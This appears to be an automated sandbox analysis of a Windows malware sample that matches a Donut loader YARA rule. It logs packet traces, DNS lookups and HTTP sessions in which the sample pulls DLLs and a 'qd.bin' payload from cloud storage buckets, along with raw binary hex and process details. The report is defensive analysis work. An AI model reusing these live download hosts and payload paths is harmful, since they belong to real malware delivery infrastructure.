                                                            Jul 25, 2024 17:09:58.410182953 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.410187960 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.410211086 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.410232067 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.410975933 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.411046028 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.411051989 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.411094904 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.411808968 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.411879063 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.411885023 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.411920071 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.412595034 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.412664890 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.412672997 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.412708998 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.412724972 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.412786007 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.412791967 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.412833929 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.413722038 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.413794041 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.413800001 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.413841009 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.414644957 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.414690018 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.414716959 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.414721966 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.414755106 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.414773941 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.416270018 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.416313887 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.416347980 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.416352034 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.416383028 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.416404963 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.496929884 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.496978045 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.497122049 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.497139931 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.497180939 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.498327017 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.498372078 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.498402119 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.498409986 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.498452902 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.498452902 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.725414038 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.725452900 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.725503922 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.725606918 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.725637913 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.725651979 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.725678921 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.725684881 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.725708008 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.725740910 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.725763083 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.725765944 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.725785971 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.725822926 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.725853920 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.726214886 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.726258039 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.726294041 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.726299047 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.726350069 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.728003979 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.728045940 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.728081942 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.728086948 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.728121042 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.728140116 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.728176117 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.728239059 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.728250027 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.728291035 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.731019974 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.731064081 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.731091976 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.731096983 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.731126070 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.731138945 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.731863976 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.731904030 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.731935978 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.731940985 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.731967926 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.731988907 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.732753992 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.732800007 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.732827902 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.732832909 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.732862949 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.732882023 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.733479977 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.733545065 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.733551025 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.733584881 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.733591080 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.733609915 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.733634949 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.733666897 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.733671904 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.733716965 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.733762026 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:58.733808994 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.734040976 CEST49721443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:58.734056950 CEST4434972182.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:59.129720926 CEST49722443192.168.2.582.156.94.47
                                                            Jul 25, 2024 17:09:59.129756927 CEST4434972282.156.94.47192.168.2.5
                                                            Jul 25, 2024 17:09:59.129832983 CEST49722443192.168.2.582.156.94.47
                                                            Jul 25, 2024 17:09:59.130191088 CEST49722443192.168.2.582.156.94.47
                                                            Jul 25, 2024 17:09:59.130204916 CEST4434972282.156.94.47192.168.2.5
                                                            Jul 25, 2024 17:10:00.878106117 CEST4434972282.156.94.47192.168.2.5
                                                            Jul 25, 2024 17:10:00.878228903 CEST49722443192.168.2.582.156.94.47
                                                            Jul 25, 2024 17:10:00.880842924 CEST4434972282.156.94.47192.168.2.5
                                                            Jul 25, 2024 17:10:00.881001949 CEST49722443192.168.2.582.156.94.47
                                                            Jul 25, 2024 17:10:00.887834072 CEST49722443192.168.2.582.156.94.47
                                                            Jul 25, 2024 17:10:00.887845039 CEST4434972282.156.94.47192.168.2.5
                                                            Jul 25, 2024 17:10:00.888676882 CEST4434972282.156.94.47192.168.2.5
                                                            Jul 25, 2024 17:10:00.888744116 CEST49722443192.168.2.582.156.94.47
                                                            Jul 25, 2024 17:10:00.889173031 CEST49722443192.168.2.582.156.94.47
                                                            Jul 25, 2024 17:10:00.936538935 CEST4434972282.156.94.47192.168.2.5
                                                            Jul 25, 2024 17:10:01.600765944 CEST4434972282.156.94.47192.168.2.5
                                                            Jul 25, 2024 17:10:01.600806952 CEST4434972282.156.94.47192.168.2.5
                                                            Jul 25, 2024 17:10:01.600828886 CEST4434972282.156.94.47192.168.2.5
                                                            Jul 25, 2024 17:10:01.600881100 CEST49722443192.168.2.582.156.94.47
                                                            Jul 25, 2024 17:10:01.600904942 CEST49722443192.168.2.582.156.94.47
                                                            Jul 25, 2024 17:10:01.600914955 CEST4434972282.156.94.47192.168.2.5
                                                            Jul 25, 2024 17:10:01.600963116 CEST49722443192.168.2.582.156.94.47
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 25, 2024 17:09:24.474505901 CEST | 192.168.2.5 | 1.1.1.1 | 0x6704 | Standard query (0) | kdll-1323571269.cos.ap-beijing.myqcloud.com | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:09:58.793559074 CEST | 192.168.2.5 | 1.1.1.1 | 0x4bfb | Standard query (0) | leisuretrade-1323571269.cos.ap-beijing.myqcloud.com | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:10:05.026292086 CEST | 192.168.2.5 | 1.1.1.1 | 0x2aee | Standard query (0) | wwwqd-1323571269.cos.ap-singapore.myqcloud.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 25, 2024 17:09:24.796689034 CEST | 1.1.1.1 | 192.168.2.5 | 0x6704 | No error (0) | kdll-1323571269.cos.ap-beijing.myqcloud.com | bj.file.myqcloud.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 25, 2024 17:09:24.796689034 CEST | 1.1.1.1 | 192.168.2.5 | 0x6704 | No error (0) | bj.file.myqcloud.com |  | 82.156.94.48 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:09:24.796689034 CEST | 1.1.1.1 | 192.168.2.5 | 0x6704 | No error (0) | bj.file.myqcloud.com |  | 82.156.94.13 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:09:24.796689034 CEST | 1.1.1.1 | 192.168.2.5 | 0x6704 | No error (0) | bj.file.myqcloud.com |  | 82.156.94.17 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:09:24.796689034 CEST | 1.1.1.1 | 192.168.2.5 | 0x6704 | No error (0) | bj.file.myqcloud.com |  | 82.156.94.45 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:09:24.796689034 CEST | 1.1.1.1 | 192.168.2.5 | 0x6704 | No error (0) | bj.file.myqcloud.com |  | 82.156.94.47 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:09:59.128614902 CEST | 1.1.1.1 | 192.168.2.5 | 0x4bfb | No error (0) | leisuretrade-1323571269.cos.ap-beijing.myqcloud.com | bj.file.myqcloud.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 25, 2024 17:09:59.128614902 CEST | 1.1.1.1 | 192.168.2.5 | 0x4bfb | No error (0) | bj.file.myqcloud.com |  | 82.156.94.47 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:09:59.128614902 CEST | 1.1.1.1 | 192.168.2.5 | 0x4bfb | No error (0) | bj.file.myqcloud.com |  | 82.156.94.48 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:09:59.128614902 CEST | 1.1.1.1 | 192.168.2.5 | 0x4bfb | No error (0) | bj.file.myqcloud.com |  | 82.156.94.13 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:09:59.128614902 CEST | 1.1.1.1 | 192.168.2.5 | 0x4bfb | No error (0) | bj.file.myqcloud.com |  | 82.156.94.17 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:09:59.128614902 CEST | 1.1.1.1 | 192.168.2.5 | 0x4bfb | No error (0) | bj.file.myqcloud.com |  | 82.156.94.45 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:10:05.618834972 CEST | 1.1.1.1 | 192.168.2.5 | 0x2aee | No error (0) | wwwqd-1323571269.cos.ap-singapore.myqcloud.com | sgp.file.myqcloud.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 25, 2024 17:10:05.618834972 CEST | 1.1.1.1 | 192.168.2.5 | 0x2aee | No error (0) | sgp.file.myqcloud.com |  | 43.153.232.152 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:10:05.618834972 CEST | 1.1.1.1 | 192.168.2.5 | 0x2aee | No error (0) | sgp.file.myqcloud.com |  | 43.152.64.193 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:10:05.618834972 CEST | 1.1.1.1 | 192.168.2.5 | 0x2aee | No error (0) | sgp.file.myqcloud.com |  | 43.152.64.207 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 17:10:05.618834972 CEST | 1.1.1.1 | 192.168.2.5 | 0x2aee | No error (0) | sgp.file.myqcloud.com |  | 43.153.232.151 | A (IP address) | IN (0x0001) | false
                                                            • kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                            • leisuretrade-1323571269.cos.ap-beijing.myqcloud.com
                                                            • wwwqd-1323571269.cos.ap-singapore.myqcloud.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49714 | 82.156.94.48 | 443 | 5780 | C:\Users\user\Desktop\LisectAVT_2403002B_185.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-25 15:09:26 UTC | 124 | OUT | GET /1.exe HTTP/1.1
User-Agent: Mozilla/5.0
Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
Cache-Control: no-cache
2024-07-25 15:09:27 UTC | 215 | IN | HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 423
Connection: close
Date: Thu, 25 Jul 2024 15:09:26 GMT
Server: tencent-cos
x-cos-request-id: NjZhMjZhYTZfOWFhYzViNjRfMjJkM18yMDBmNGZj
2024-07-25 15:09:27 UTC | 423 | IN | Data Ascii: <?xml version='1.0' encoding='utf-8' ?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Resource>/1.exe</Resource><RequestId>NjZhMjZhYTZfOWFhYzViNjRfMjJkM18yMDBmNGZj</RequestId><TraceId>OGVmYzZiMmQzYjA2OWNhODk0N


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49715 | 82.156.94.48 | 443 | 5780 | C:\Users\user\Desktop\LisectAVT_2403002B_185.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-25 15:09:28 UTC | 131 | OUT | GET /msvcr120.dll HTTP/1.1
User-Agent: Mozilla/5.0
Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
Cache-Control: no-cache
2024-07-25 15:09:29 UTC | 472 | IN | HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 970744
Connection: close
Accept-Ranges: bytes
Content-Disposition: attachment
Date: Thu, 25 Jul 2024 15:09:29 GMT
ETag: "50097ec217ce0ebb9b4caa09cd2cd73a"
Last-Modified: Wed, 20 Mar 2024 20:21:49 GMT
Server: tencent-cos
x-cos-force-download: true
x-cos-hash-crc64ecma: 7136594693983466067
x-cos-request-id: NjZhMjZhYTlfZmFjMjBiMDlfNzAyNl8xZmFhZTg4
x-cos-server-side-encryption: AES256
                                                            Data Ascii: L$+AL$+AL$+AL$+UUMV_dEY[u8SWu+3FtOu_[3^]+CtOtJuuUVWS33333[_^]UEUS]VWE{s38EGO30E@f$


Session ID: 2
Source IP: 192.168.2.5
Source Port: 49718
Destination IP: 82.156.94.48
Destination Port: 443
PID: 5780
Process: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-25 15:09:43 UTC | 135 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0
Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
Cache-Control: no-cache
2024-07-25 15:09:43 UTC | 476 | IN | HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 91104
Connection: close
Accept-Ranges: bytes
Content-Disposition: attachment
Date: Thu, 25 Jul 2024 15:09:43 GMT
ETag: "9c133b18fa9ed96e1aeb2da66e4a4f2b"
Last-Modified: Wed, 20 Mar 2024 20:24:50 GMT
Server: tencent-cos
x-cos-force-download: true
x-cos-hash-crc64ecma: 15584681233261869999
x-cos-request-id: NjZhMjZhYjdfOTY0ZTQ0MGJfMTNiZjNfM2ViMmU3Zg==
x-cos-server-side-encryption: AES256


Session ID: 3
Source IP: 192.168.2.5
Source Port: 49720
Destination IP: 82.156.94.48
Destination Port: 443
PID: 5780
Process: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-25 15:09:47 UTC | 131 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0
Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
Cache-Control: no-cache
2024-07-25 15:09:47 UTC | 473 | IN | HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 446840
Connection: close
Accept-Ranges: bytes
Content-Disposition: attachment
Date: Thu, 25 Jul 2024 15:09:47 GMT
ETag: "c766ca0482dfe588576074b9ed467e38"
Last-Modified: Wed, 20 Mar 2024 20:21:50 GMT
Server: tencent-cos
x-cos-force-download: true
x-cos-hash-crc64ecma: 10292142785671919093
x-cos-request-id: NjZhMjZhYmJfN2JjMDBiMDlfYWZhMl8xZGZlOGMx
x-cos-server-side-encryption: AES256


Session ID: 4
Source IP: 192.168.2.5
Source Port: 49721
Destination IP: 82.156.94.48
Destination Port: 443
PID: 5780
Process: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-25 15:09:57 UTC | 131 | OUT | GET /msvcp120.dll HTTP/1.1
User-Agent: Mozilla/5.0
Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
Cache-Control: no-cache
2024-07-25 15:09:57 UTC | 476 | IN | HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 455160
Connection: close
Accept-Ranges: bytes
Content-Disposition: attachment
Date: Thu, 25 Jul 2024 15:09:57 GMT
ETag: "50260b0f19aaa7e37c4082fecef8ff41"
Last-Modified: Wed, 20 Mar 2024 20:21:48 GMT
Server: tencent-cos
x-cos-force-download: true
x-cos-hash-crc64ecma: 9823542669508837271
x-cos-request-id: NjZhMjZhYzVfYTRhZTE0MGJfMTFkYWNfM2ZkMjM2MA==
x-cos-server-side-encryption: AES256
                                                            2024-07-25 15:09:58 UTC8184INData Raw: 0e 8b 49 04 8b 4c 31 38 e8 93 f9 ff ff 0f b7 c0 8b c8 b8 ff ff 00 00 66 3b c1 75 20 8b 06 8b 48 04 03 ce 8b 41 0c 83 c8 01 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 3f ed ff ff eb 4a 8b 07 51 6a 48 8b cf ff 50 10 84 c0 74 3c 8b 06 8b 40 04 8b 4c 30 38 e8 6b f9 ff ff eb b3 8b 4d ec 8b 01 8b 50 04 03 d1 8b 42 0c 83 c8 04 83 7a 38 00 75 03 83 c8 04 6a 01 50 8b ca e8 fc ec ff ff b8 7b 0a 01 10 c3 8b 75 ec 83 4d fc ff 8b 0e 8b 49 04 03 ce 83 79 0c 00 75 04 b0 01 eb 19 8b 41 0c 83 c8 02 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 c7 ec ff ff 32 c0 e8 8f a8 02 00 c2 04 00 55 8b ec 53 8b 5d 08 56 53 8b f1 e8 7f 01 00 00 84 c0 74 1c 83 7e 14 10 72 04 8b 06 eb 02 8b c6 ff 75 0c 2b d8 8b ce 53 56 e8 b9 fa ff ff eb 43 57 8b 7d 0c 8b ce 6a 00 57 e8 ed 00 00 00 84 c0 74 2e 83
                                                            Data Ascii: IL18f;u HAy8ujP?JQjHPt<@L08kMPBz8ujP{uMIyuAy8ujP2US]VSt~ru+SVCW}jWt.
                                                            2024-07-25 15:09:58 UTC8184INData Raw: 66 83 39 00 75 05 33 c0 40 5d c3 6a 02 58 5d c3 a9 ff 7f ff ff 75 0a 66 83 39 00 75 04 33 c0 5d c3 33 c0 66 85 d2 0f 95 c0 83 e8 02 5d c3 55 8b ec 8b 45 08 83 c0 02 5d c3 55 8b ec 51 56 8b 75 08 d9 06 dc 1d 50 12 00 10 df e0 d9 ee f6 c4 05 0f 8b 0c 01 00 00 d9 45 0c dd e1 df e0 f6 c4 44 0f 8b fa 00 00 00 d9 06 dc 1d 40 12 00 10 df e0 f6 c4 41 75 12 dd d9 33 c0 dd d8 40 d9 05 00 31 06 10 e9 dd 00 00 00 d9 06 dc 0d 20 12 00 10 d9 5d 08 d9 45 08 d8 d2 df e0 dd da f6 c4 05 7a 08 d9 05 48 12 00 10 eb 06 d9 05 18 12 00 10 d9 5d 08 d9 45 08 de c2 d9 c9 e8 33 84 02 00 0f b7 c8 0f bf c1 89 45 08 db 45 08 d9 5d 08 d9 06 d9 45 08 dd 05 a0 11 00 10 d8 c9 de ea dc 0d 10 12 00 10 de e9 d9 5d 08 d9 05 30 31 06 10 d9 c0 d9 e0 d9 45 08 d8 d1 df e0 dd d9 f6 c4 41 75 0f d8
                                                            Data Ascii: f9u3@]jX]uf9u3]3f]UE]UQVuPED@Au3@1 ]EzH]E3EE]E]01EAu
                                                            2024-07-25 15:09:58 UTC16368INData Raw: 04 85 db 74 47 3b f8 7f 0b 7c 04 3b f3 73 05 8b de 89 7d 10 85 db 74 12 53 ff 75 08 ff 75 f0 e8 f4 68 02 00 8b 4d fc 83 c4 0c 01 5d 08 03 cb 8b 55 f8 13 55 10 2b f3 89 55 f8 8b 55 f4 1b 7d 10 8b 42 30 29 18 8b 42 20 01 18 eb 28 8b 4d f4 8b 5d 08 8b 11 0f b6 03 50 ff 52 0c 83 f8 ff 74 2c 8b 4d fc 43 83 c1 01 89 5d 08 83 55 f8 00 83 c6 ff 83 d7 ff 8b 5d f4 89 4d fc 85 ff 0f 8f 5c ff ff ff 7c 08 85 f6 0f 85 52 ff ff ff 8b 4d fc 8b 55 f8 5e 5f 8b c1 5b 8b e5 5d c2 0c 00 6a 08 b8 1a d2 03 10 e8 e1 68 02 00 8b f1 89 75 ec 33 d2 89 55 f0 39 55 10 74 17 c7 06 ec 1c 00 10 c7 46 18 24 1c 00 10 89 55 fc c7 45 f0 01 00 00 00 8b 06 ff 75 0c ff 75 08 8b 40 04 c7 04 06 e8 1c 00 10 8b 06 8b 48 04 8d 41 e8 89 44 31 fc 8b 06 89 56 08 89 56 0c 8b 48 04 03 ce e8 bd f6 ff ff
                                                            Data Ascii: tG;|;s}tSuuhM]UU+UU}B0)B (M]PRt,MC]U]M\|RMU^_[]jhu3U9UtF$UEuu@HAD1VVH


                                                            Session ID:5
                                                            Source IP:192.168.2.5
                                                            Source Port:49722
                                                            Destination IP:82.156.94.47
                                                            Destination Port:443
                                                            PID:5780
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            2024-07-25 15:10:00 UTC  137  OUT  GET /zf_cef.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0
                                                            Host: leisuretrade-1323571269.cos.ap-beijing.myqcloud.com
                                                            Cache-Control: no-cache
                                                            2024-07-25 15:10:01 UTC  477  IN  HTTP/1.1 200 OK
                                                            Content-Type: application/x-msdownload
                                                            Content-Length: 219584
                                                            Connection: close
                                                            Accept-Ranges: bytes
                                                            Content-Disposition: attachment
                                                            Date: Thu, 25 Jul 2024 15:10:01 GMT
                                                            ETag: "e864fe41a4fedec386a65cb456ca3066"
                                                            Last-Modified: Thu, 21 Mar 2024 19:42:27 GMT
                                                            Server: tencent-cos
                                                            x-cos-force-download: true
                                                            x-cos-hash-crc64ecma: 14474361187052609782
                                                            x-cos-request-id: NjZhMjZhYzlfYTYzMDkyMWVfMTUzNTlfMWYyOWRmNg==
                                                            x-cos-server-side-encryption: AES256


                                                            Session ID:6
                                                            Source IP:192.168.2.5
                                                            Source Port:49723
                                                            Destination IP:43.153.232.152
                                                            Destination Port:443
                                                            PID:5780
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            2024-07-25 15:10:07 UTC  123  OUT  GET /qd.bin HTTP/1.1
                                                            User-Agent: loader
                                                            Host: wwwqd-1323571269.cos.ap-singapore.myqcloud.com
                                                            Cache-Control: no-cache
                                                            2024-07-25 15:10:07 UTC  472  IN  HTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 40917
                                                            Connection: close
                                                            Accept-Ranges: bytes
                                                            Content-Disposition: attachment
                                                            Date: Thu, 25 Jul 2024 15:10:07 GMT
                                                            ETag: "8aa72f47438eebd6fe0e8c94bd206ca8"
                                                            Last-Modified: Fri, 22 Mar 2024 10:42:51 GMT
                                                            Server: tencent-cos
                                                            x-cos-force-download: true
                                                            x-cos-hash-crc64ecma: 16559786720377567833
                                                            x-cos-request-id: NjZhMjZhY2ZfZjM3NWI3MDlfMTVmZjVfNjZkOTJk
                                                            x-cos-server-side-encryption: AES256



                                                            Target ID:0
                                                            Start time:11:09:20
                                                            Start date:25/07/2024
                                                            Path:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\LisectAVT_2403002B_185.exe"
                                                            Imagebase:0x5e0000
                                                            File size:328'552 bytes
                                                            MD5 hash:0AAFD40537A281B281BD85EFCB2C976B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000003.2552378256.0000000000D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:11:09:20
                                                            Start date:25/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:11:10:14
                                                            Start date:25/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
